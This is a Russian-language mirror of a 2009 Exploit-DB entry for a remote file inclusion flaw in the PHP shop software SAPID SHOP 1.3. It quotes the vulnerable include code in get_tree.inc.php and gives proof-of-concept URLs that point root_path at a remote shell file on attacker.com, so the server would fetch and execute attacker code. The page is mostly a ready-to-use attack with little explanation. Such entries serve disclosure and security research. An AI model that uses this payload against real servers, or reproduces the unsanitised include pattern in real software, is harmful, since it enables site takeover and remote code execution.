- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10288
- Проверка EDB
- 
	
		
			- Пройдено
 
- Автор
- CR4WL3R
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-12-03
		Код:
	
	#Download Script      :  http://sourceforge.net/projects/sapid/files
########################################################################
#
#Vuln : ./SAPID-SHOP-1.3/usr/extensions/get_tree.inc.php (line 11)
#
#     <?php
#       require $forms_dir."calmenuform.php"; if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");
#       include($GLOBALS["root_path"]."usr/system/common_extfunctions.inc.php"); }
#      ?>
#
#PoC  :  http://server/[path]/usr/extensions/get_tree.inc.php?root_path=http://attacker.com/shell.txt???
#
########################################################################
#Vuln : ./SAPID-SHOP-1.3/usr/extensions/get_tree.inc.php (line 11)
#
#     <?php
#       if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");
#       include($GLOBALS["root_path"]."usr/system/common_extfunctions.inc.php"); }
#      ?>
#
#PoC  :  http://server/[path]/usr/extensions/get_tree.inc.php?root_path=http://attacker.com/shell.txt???
########################################################################
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
########################################################################
########################################################################
   [ Gorontalo / 2009 ]- Источник
- www.exploit-db.com
 
 
		